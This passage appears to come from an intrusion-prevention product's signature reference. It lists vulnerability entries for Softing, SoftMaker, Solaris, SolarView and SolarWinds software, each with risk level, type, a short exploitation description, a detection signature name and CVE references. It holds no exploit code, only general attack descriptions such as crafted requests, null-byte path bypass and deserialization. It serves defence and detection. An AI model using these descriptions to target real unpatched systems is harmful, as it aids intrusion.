Description: A directory traversal vulnerability exists in Softing edgeAggregator. The vulnerability is due to improper validation of user data used in file paths in the backup/restore operation. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary write access to the server which, in the worst case, can be utilized to achieve arbitrary code execution under the security context of root.
Situation: File-Member-Name_Softing-Edgeaggregator-Restore-Configuration-Directory-Traversal
References:
CVE-2023-38126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38126
Back to top

Softing-Secure-Integration-Server-v1.22-RCE

About this vulnerability: An attempt to exploit a vulnerability in Softing Secure Integration Server detected
Risk: High
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Platform: Windows
Software: Softing Secure Integration Server
Type: Directory Traversal
Description: A vulnerability in Softing Secure Integration Server, version v1.22, which allows remote attackers to execute arbitrary commands by uploading a malicious config zip file which contains a directory traversal.
Situation: File-Zip_Softing-Secure-Integration-Server-v1.22-RCE
References:
CVE-2022-1373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1373
Back to top

Softmaker-Office-Planmaker-Excel-Sst-Record-Buffer-Overflow

About this vulnerability: A vulnerability in SoftMaker Office PlanMaker
Risk: Moderate
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: SoftMaker Office PlanMaker
Type: Malfunction
Description: Improper handling of the RecordDataLength field in SST records of OLE files causes a buffer overflow vulnerability in SoftMaker Office Planmaker. A successful exploit may allow an attacker to execute arbitrary code on the target system with the privileges of the vulnerable application.
Situation: File-OLE_Softmaker-Office-Planmaker-Excel-Sst-Record-Buffer-Overflow
References:
CVE-2020-13586
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13586
Back to top

Softmaker-Office-Planmaker-Pmd-Document-0x8010-Record-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in SoftMaker Office PlanMaker
Risk: Moderate
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Platform: Generic
Software: SoftMaker Office PlanMaker
Type: Malfunction
Description: An out of bounds write vulnerability has been reported in SoftMaker Office PlanMaker. The vulnerability is due to improper handling of the 0x8010 records in PMD documents. A remote, unauthenticated attacker can exploit this vulnerability by enticing an user to open a crafted file. Successful exploitation results in arbitrary code execution in security context of the application.
Situation: File-OLE_Softmaker-Office-Planmaker-Pmd-Document-0x8010-Record-Out-Of-Bounds-Write
References:
CVE-2020-13580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13580
Back to top

Softmaker-Office-Planmaker-Pmd-Document-Records-Integer-Overflow

About this vulnerability: A vulnerability in SoftMaker Office PlanMaker
Risk: Moderate
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1324-5242
Platform: Generic
Software: SoftMaker Office PlanMaker
Type: Integer Overflow
Description: Improper handling of 0x8011 and 0x820A records in PMD documents causes an integer overflow vulnerability in SoftMaker Office PlanMaker. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the affected application.
Situation: File-OLE_Softmaker-Office-Planmaker-Pmd-Document-Records-Integer-Overflow
References:
CVE-2020-13579
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13579
Back to top

SOHO-Router-Products-Cookie-Parsing-Authentication-Bypass

About this vulnerability: A vulnerability in Small Office Home Office (SOHO) Router Devices containing an old version of AllegroSoft ROMPager embedded webserver
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: An authentication bypass vulnerability exists when parsing HTTP cookies in multiple Small Office Home Office (SOHO) Router Devices containing an old version of AllegroSoft ROMPager embedded webserver. A patch for this vulnerability was created in 2005 by AllegroSoft, but many devices embedding this software have not been updated or do not have updated firmware available. This vulnerability has been branded "Misfortune Cookie".
Situation: HTTP_CS-SOHO-Router-Products-Cookie-Parsing-Authentication-Bypass
References:
CVE-2014-9222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222
Back to top

Sojourn-File-Disclosure

About this vulnerability: sojourn.cgi file disclosure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: Sojourn
Type: Directory Traversal
Description: The sojourn.cgi script allows reading the contents of any file on the system by requesting for a category. The appended '.txt' can be bypassed with a '%00' and the script does not restrict itself to the Web server's root directory nor to the allowed categories on the server.
Situation: HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence
References:
CVE-2000-0180
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0180
BID-1052
http://www.securityfocus.com/bid/1052
Back to top

Solaris-Answerbook2-Format-Strings-Vulnerability

About this vulnerability: Format strings vulnerability in Answerbook2 http server
Risk: High
First detected in: sgpkg-ips-102-1314
Last changed: sgpkg-ips-1589-5242
Platform: Solaris
Software: <os>
Type: Format String
Description: There is a vulnerability in the Solaris Answerbook web server. The vulnerability allows remote attackers to execute arbitrary commands via encoded % characters in an HTTP request.
Situation: HTTP_CS-Solaris-Answerbook2-Format-Strings-Vulnerability
References:
CVE-1999-1417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1417
BID-253
http://www.securityfocus.com/bid/253
OSVDB-10882
http://www.osvdb.org/10882
Back to top

Solaris-BIND-Inverse-Query-BO

About this vulnerability: Inverse Query Buffer Overflow in BIND 4.9
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: BIND
Type: Buffer Overflow
Description: The BIND DNS daemon contains a buffer overflow vulnerability that is exploitable via inverse query. Once exploited, the attacker may be able to execute arbitrary code as the user under which the MDNS daemon is being run. This user is most likely "root".
Situation: DNS-TCP_Sparc-BOF
References:
CVE-1999-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0009
BID-134
http://www.securityfocus.com/bid/134
Back to top

Solaris-Rwalld-RPC-Call-Format-String-Vulnerability

About this vulnerability: Syslog format string vulnerability in rpc.rwalld.
Risk: Critical
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1296-5242
Platform: Sun Solaris 2.6; Solaris 7; Solaris 8; Solaris 9
Software: rpc.rwalld
Type: Format String
Description: An insecure syslog call in rpc.rwalld can be exploited by an attacker to execute arbitrary commands with administrator privileges.
Situation: Generic_UDP-Solaris-Rwalld-RPC-Call-Format-String
References:
CVE-2002-0573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0573
BID-4639
http://www.securityfocus.com/bid/4639
OSVDB-778
http://www.osvdb.org/778
Back to top

Solaris-sadmind-Auth-Sys-System-Compromise

About this vulnerability: Sun Solaris contains a remote system compromise flaw
Risk: High
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Solaris 8; Solaris 9
Software: <os>
Type: Malfunction
Description: The default installation of sadmind on Solaris uses weak authentication (AUTH_SYS). A remote attacker could send a specially crafted Remote Procedure Call (RPC) packet and may be able to forge the AUTH_SYS credentials. This would allow the execution of arbitrary commands with root privileges.
Situation: Generic_Solaris-sadmind-Weak-Authentication
References:
CVE-2003-0722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0722
BID-8615
http://www.securityfocus.com/bid/8615
OSVDB-4585
http://www.osvdb.org/4585
Back to top

Solaris-SnmpXdmid-Malformed-DMI-Request-BOF

About this vulnerability: Bufffer overflow in Solaris snmpXdmid daemon
Risk: High
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: snmpXdmid
Type: Buffer Overflow
Description: Sun Solaris is vulnerable to a buffer overflow in the snmpXdmid daemon. The 'snmpXdmid' service is a mapping tool for SNMP and DMI (Desktop Management Interface) requests and is installed with root privileges. By causing the snmpXdmid daemon to translate a malformed DMI request into an SNMP trap, a remote attacker can overflow a buffer to gain root access to the system.
Situation: Generic_SunRPC-SnmpXdmid-Exploit-Detected
SunRPC_SnmpXdmid-Detected
References:
CVE-2001-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0236
BID-2417
http://www.securityfocus.com/bid/2417
OSVDB-546
http://www.osvdb.org/546
Back to top

Solaris-Telnet-Passwordless-Remote-Access

About this vulnerability: A critical flaw allows remote logins to any account without password
Risk: High
First detected in: sgpkg-ips-95-1314
Last changed: sgpkg-ips-1296-5242
Platform: Solaris 10; Solaris 11
Software: Generic telnet server
Type: Malfunction
Description: The Solaris telnet daemon has a vulnerability that allows a remote attacker to log in into any account without knowing the password. Administrative accounts such as root, sys, and bin are also vulnerable.
Situation: Telnet_CCS-Solaris-Telnet-Passwordless-Remote-Access
References:
CVE-2007-0882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882
BID-22512
http://www.securityfocus.com/bid/22512
OSVDB-31881
http://www.osvdb.org/31881
Back to top

Solarview-Compact-Command-Injection-CVE-2022-29303

About this vulnerability: A vulnerability in SolarView Compact
Risk: High
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1529-5242
Platform: Generic
Software: SolarView
Type: Input Validation
Description: A command injection vulnerability has been reported in SolarView Compact 6.0. An unauthenticated remote attacker can use this vulnerability to execute arbitrary commands.
Situation: HTTP_CRL-Solarview-Compact-Command-Injection-CVE-2022-29303
References:
CVE-2022-29303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
Back to top

Solarview-Compact-Command-Injection-CVE-2023-23333

About this vulnerability: A vulnerability in SolarView Compact
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: SolarView
Type: Input Validation
Description: A command injection vulnerability has been reported in SolarView Compact 6.0 and earlier. An unauthenticated remote attacker can use this vulnerability to execute arbitrary commands.
Situation: HTTP_CRL-Solarview-Compact-Command-Injection-CVE-2023-23333
References:
CVE-2023-23333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23333
Back to top

Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-23478

About this vulnerability: A vulnerability in SolarWinds Access Rights Manager
Risk: Moderate
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: SolarWinds Access Rights Manager
Type: Input Validation
Description: An insecure deserialization vulnerability exists in SolarWinds Access Rights Manager. The vulnerability is due to lack of input validation leading to insecure deserialization in JsonSerializationBinder class. A remote, authenticated attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation can result in arbitrary code execution on the target server under the security context of IIS AppPool.
Situation: File-Text_Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-23478
References:
CVE-2024-23478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23478
Back to top

Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-28075

About this vulnerability: A vulnerability in SolarWinds Access Rights Manager
Risk: Moderate
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: SolarWinds Access Rights Manager
Type: Input Validation
Description: An insecure deserialization vulnerability exists in SolarWinds Access Rights Manager. The vulnerability is due to lack of input validation leading to insecure deserialization in JsonSerializationBinder class. A remote, authenticated attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation can result in arbitrary code execution on the target server under the security context of IIS AppPool.
Situation: File-Text_Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-28075
References:
CVE-2024-28075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28075
Back to top

Solarwinds-Dameware-Mini-Remote-Control-CltDHPubKeyLen-Out-of-Bounds-Read

About this vulnerability: A vulnerability in SolarWinds DameWare Mini Remote Control
Risk: High
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DameWare Mini Remote Control
Type: Input Validation
Description: A vulnerability in SolarWinds DameWare Mini Remote Control, versions 12.1.0.34 and prior, which allows remote attackers to cause an out of bounds read by sending a specially crafted message to the target system, due to a user controlled loop counter via the CltDHPubKeyLen parameter.
Situation: Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-CltDHPubKeyLen-Out-of-Bounds-Read
References:
CVE-2019-3956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3956
Back to top

Solarwinds-Dameware-Mini-Remote-Control-Rsapubkeylen-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in SolarWinds DameWare Mini Remote Control
Risk: Moderate
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DameWare Mini Remote Control
Type: Input Validation
Description: There has been reported a heap buffer overflow vulnerability in SolarWinds DameWare Mini Remote Control. This vulnerability could be exploited remotely by an unauthenticated user. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-Rsapubkeylen-Heap-Buffer-Overflow
References:
CVE-2019-3955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3955
Back to top

Solarwinds-Dameware-Mini-Remote-Control-RsaSignatureLen-Out-of-Bounds-Read

About this vulnerability: A vulnerability in SolarWinds DameWare Mini Remote Control
Risk: High
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DameWare Mini Remote Control
Type: Input Validation
Description: A vulnerability in SolarWinds DameWare Mini Remote Control, versions 12.1.0.34 and before, which allows remote attackers to cause an out of bounds read by sending a specially crafted message to the target system, due to a user controlled loop counter via the RsaSignatureLen parameter.
Situation: Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-RsaSignatureLen-Out-of-Bounds-Read
References:
CVE-2019-3957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3957
Back to top

Solarwinds-Dameware-Sigpubkey-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in SolarWinds DameWare
Risk: Moderate
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DameWare Mini Remote Control
Type: Buffer Overflow
Description: There has been reported a pre-auth heap buffer overread and overflow vulnerability in SolarWinds DameWare. Successful exploitation could lead in denial of service conditions on the target server.
Situation: Generic_CS-Solarwinds-Dameware-Sigpubkey-Heap-Buffer-Overflow
References:
CVE-2020-5734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5734
Back to top

Solarwinds-Firewall-Security-Manager-Userlogin.jsp-Policy-Bypass

About this vulnerability: A vulnerability in SolarWinds Firewall Security Manager
Risk: Moderate
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: SolarWinds Firewall Security Manager
Type: Malfunction
Description: A policy bypass vulnerability exists in SolarWinds Firewall Security Manager. The vulnerability is due to a design weakness in the userlogin.jsp page which sets the "username" session value to a user supplied value prior to authentication. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the vulnerable page. Successful exploitation could lead to a policy bypass condition on the server.
Situation: HTTP_CSU-Solarwinds-Firewall-Security-Manager-Userlogin.jsp-Policy-Bypass
References:
CVE-2015-2284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2284
OSVDB-119559
http://www.osvdb.org/119559
Back to top

Solarwinds-Log-And-Event-Manager-Static-Credentials

About this vulnerability: A vulnerability in SolarWinds Log & Event Manager
Risk: Moderate
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Log and Event Manager
Type: Malfunction
Description: A policy bypass vulnerability exists in SolarWinds Log and Event Manager. The vulnerability is due to the usage of static/default credentials to access the HyperSQL database. A remote attacker can exploit this vulnerability to access the database with administrator privileges. Once accessed, the attacker can read and write information in the database which can lead to remote code execution in the context of the database.
Situation: Generic_CS-Solarwinds-Log-And-Event-Manager-Static-Credentials
References:
CVE-2014-5504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5504
OSVDB-110872
http://www.osvdb.org/110872
Back to top

Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write

About this vulnerability: A vulnerability in SolarWinds Network Configuration Manager
Risk: High
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1481-5242
Platform: Generic
Software: SolarWinds Network Configuration Manager
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in SolarWinds Network Configuration Manager. The vulnerability is due to insufficient validation of file types for vulnerability announcement data files in VulnerabilitySettings.aspx, combined with a lack of restriction on destination paths. A remote, authenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation results in the writing of an arbitrary file to a location chosen by the attacker, potentially leading to execution of arbitrary code as SYSTEM.
Situation: File-Text_Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write
HTTP_CRL-Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write
References:
CVE-2020-27871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27871
Back to top

Solarwinds-Network-Performance-Monitor-CVE-2022-38111-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Network Performance Monitor (NPM)
Risk: High
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor (NPM). The vulnerability is due to insecure deserialization from TextFormattingRunProperties class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution under the security context of SYSTEM.
Situation: Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2022-38111-Insecure-Deserialization
References:
CVE-2022-38111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38111
Back to top

Solarwinds-Network-Performance-Monitor-CVE-2022-47503-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Platform
Risk: High
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor. The vulnerability is due to insecure deserialization from WorkerControllerWCFProxy class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution under the security context of SYSTEM.
Situation: Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2022-47503-Insecure-Deserialization
References:
CVE-2022-47503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47503
Back to top

Solarwinds-Network-Performance-Monitor-CVE-2023-23836-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Network Performance Monitor (NPM)
Risk: High
First detected in: sgpkg-ips-1623-5242
Last changed: sgpkg-ips-1623-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor (NPM). The vulnerability is due to insecure deserialization from CredentialInitializer class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution on the target server, in the worst case, under the security context of SYSTEM.
Situation: Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2023-23836-Insecure-Deserialization
References:
CVE-2023-23836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23836
Back to top

Solarwinds-Network-Performance-Monitor-Fromjson-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Network Performance Monitor (NPM)
Risk: Moderate
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Input Validation
Description: The SolarWinds.Serialization library does not properly validate incoming data, which causes a deserialization vulnerability that allows a remote attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Solarwinds-Network-Performance-Monitor-Fromjson-Insecure-Deserialization
References:
CVE-2021-31474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31474
Back to top

Solarwinds-Network-Performance-Monitor-Sqlfilescript-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Platform
Risk: Moderate
First detected in: sgpkg-ips-1603-5242
Last changed: sgpkg-ips-1603-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor. The vulnerability is due to insecure deserialization from SqlFileScript class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary file read and information disclosure. If combined with other attack vectors, it could result in remote code execution under the security context of SYSTEM.
Situation: Generic_CS-Solarwinds-Network-Performance-Monitor-Sqlfilescript-Insecure-Deserialization
References:
CVE-2022-47504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47504
Back to top

Solarwinds-Network-Performance-Monitor-Updateactionsdescriptions-SQL-Injection

About this vulnerability: A vulnerability in SolarWinds Network Performance Monitor (NPM)
Risk: Moderate
First detected in: sgpkg-ips-1545-5242
Last changed: sgpkg-ips-1545-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Input Validation
Description: Improper validation of data submitted to the UpdateActionsDescriptions API endpoint causes an SQL injection vulnerability in SolarWinds Network Performance Monitor. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Solarwinds-Network-Performance-Monitor-Updateactionsdescriptions-SQL-Injection
References:
CVE-2022-36961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36961
Back to top

Solarwinds-NPM-BytesToMessage-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Network Performance Monitor.
Risk: High
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Input Validation
Description: A vulnerability in SolarWinds Network Performance Monitor, in SolarWinds Network Performance Monitor (NPM) 2022.3 and prior, and SolarWinds Orion Platform 2020.2.6 HF5 and prior, which allows remote attackers to execute arbitrary code on the target system under the security context of SYSTEM by sending crafted requests, due to insufficient validation of user-supplied data in BytesToMessage function.
Situation: Generic_CS-Solarwinds-NPM-BytesToMessage-Insecure-Deserialization
References:
CVE-2022-38108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38108
Back to top

Solarwinds-NPM-DeserializeFromStrippedXml-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Network Performance Monitor.
Risk: High
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Input Validation
Description: A vulnerability in SolarWinds Network Performance Monitor, in SolarWinds Network Performance Monitor (NPM) 2022.3 and prior, and SolarWinds Orion Platform 2020.2.6 HF5 and prior, which allows remote attackers to execute arbitrary code on the target system under the security context of SYSTEM by sending crafted requests, due to insufficient validation of user-supplied data in DeserializeFromStrippedXml function.
Situation: HTTP_CRL-Solarwinds-NPM-DeserializeFromStrippedXml-Insecure-Deserialization
References:
CVE-2022-36958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36958
Back to top

Solarwinds-NPM-Propertybagjsonconverter-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Network Performance Monitor (NPM)
Risk: High
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM); SolarWinds Orion
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in SolarWinds Network Performance Monitor. The vulnerability is due to insufficient validation of user-supplied data in the PropertyBagJsonConverter class. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution under the security context of SYSTEM.
Situation: Generic_CS-Solarwinds-NPM-Propertybagjsonconverter-Insecure-Deserialization
References:
CVE-2022-36957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36957
Back to top

Solarwinds-Orion-Ipam-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in SolarWinds Orion IPAM
Risk: Moderate
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: SolarWinds Orion IPAM
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been found in SolarWinds Orion IPAM's web interface. The vulnerability is due to insufficient sanitization of user-supplied input, which is echoed back to the user. An attacker can exploit this issue to inject HTML and script code, which will be executed in the target user's browser in the security context of the vulnerable site.
Situation: HTTP_CRL-Solarwinds-Orion-Ipam-Reflected-Cross-Site-Scripting
References:
CVE-2012-4939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4939
BID-56342
http://www.securityfocus.com/bid/56342
OSVDB-86801
http://www.osvdb.org/86801
Back to top

Solarwinds-Orion-NPM-Remote-Code-Execution

About this vulnerability: A vulnerability in SolarWinds Orion NPM
Risk: High
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SolarWinds Network Performance Monitor (NPM)
Type: Insecure Configuration
Description: A vulnerability in SolarWinds Orion NPM, verions prior to 12.4, which allows remote attackers to execute arbitrary code as SYSTEM by sending a crafted request to the OrionModuleEngine service.
Situation: Generic_CS-Solarwinds-Orion-NPM-Remote-Code-Execution
References:
CVE-2019-8917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8917
Back to top

Solarwinds-Orion-Patch-Manager-Chart-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Patch Manager
Risk: Moderate
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Generic
Software: SolarWinds Patch Manager
Type: Input Validation
Description: Insufficient input validation if the contents of the tp parameter of the Chart.ashx endpoint causes an insecure deserialization vulnerability in SolarWinds Patch Manager. A successful exploit allows an attacker to execute code under the security context of NETWORK SERVICE.
Situation: HTTP_CSU-Solarwinds-Orion-Patch-Manager-Chart-Insecure-Deserialization
References:
CVE-2021-35218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35218
Back to top

Solarwinds-Orion-Patch-Manager-Edittopxx-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Patch Manager
Risk: Moderate
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: SolarWinds Patch Manager
Type: Input Validation
Description: Insufficient input validation of the ThwackData parameter in the EditTopXX.aspx endpoint causes a deserialization vulnerability in Solarwinds Patch Manager.
Situation: HTTP_CRL-Solarwinds-Orion-Patch-Manager-Edittopxx-Insecure-Deserialization
References:
CVE-2021-35216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35216
Back to top

Solarwinds-Orion-Patch-Manager-Wsasyncexecutetasks.aspx-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Patch Manager
Risk: Moderate
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Platform: Generic
Software: SolarWinds Patch Manager
Type: Input Validation
Description: There is an insecure deserialization vulnerability in the Patch Manager Web Console of the SolarWinds Orion Platform. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Solarwinds-Orion-Patch-Manager-Wsasyncexecutetasks.aspx-Insecure-Deserialization
References:
CVE-2021-35217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35217
Back to top

Solarwinds-Orion-Pepco32c-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Gigasoft ProEssentials v5 Pro
Risk: Moderate
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Gigasoft ProEssentials; SolarWinds Server and Application Monitor
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in SolarWinds Orion Server and Application Monitor. The vulnerability is due to insufficient bounds checking on the PEstrarg1 parameter of the Pepco32c control. The application copies the parameter into a fixed size buffer, which can be overflowed. The vulnerable ActiveX control is part of the Gigasoft ProEssentials library embedded in SolarWinds Orion to provide charting functionality. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution within security context of the target user. The vendor, SolarWinds, has not released a patch for this vulnerability at the time of writing.
Situation: File-Text_Solarwinds-Orion-Pepco32c-ActiveX-Control-Buffer-Overflow
References:
BID-62585
http://www.securityfocus.com/bid/62585
OSVDB-97661
http://www.osvdb.org/97661
Back to top

Solarwinds-Orion-Platform-Authentication-Bypass

About this vulnerability: A vulnerability in SolarWinds Orion Platform
Risk: Moderate
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: SolarWinds Orion
Type: Malfunction
Description: Improper URL path handling causes an authentication bypass vulnerability in SolarWinds Orion. A successful exploit allows an attacker to access privileged API endpoints.
Situation: HTTP_CSU-Solarwinds-Orion-Platform-Authentication-Bypass
References:
CVE-2020-10148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10148
Back to top

Solarwinds-Orion-Platform-MSMQ-Insecure-Deserialization

About this vulnerability: A vulnerability in SolarWinds Orion Platform
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: SolarWinds Orion
Type: Input Validation
Description: A insecure deserialization vulnerability has been reported in SolarWinds Orion, the core platform for multiple SolarWinds products. The vulnerability is due to insufficient validation of messages sent to the MSMQ message queue. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in remote code execution under the security context as SYSTEM.
Situation: Generic_CS-Solarwinds-Orion-Platform-MSMQ-Insecure-Deserialization
References:
CVE-2021-25274
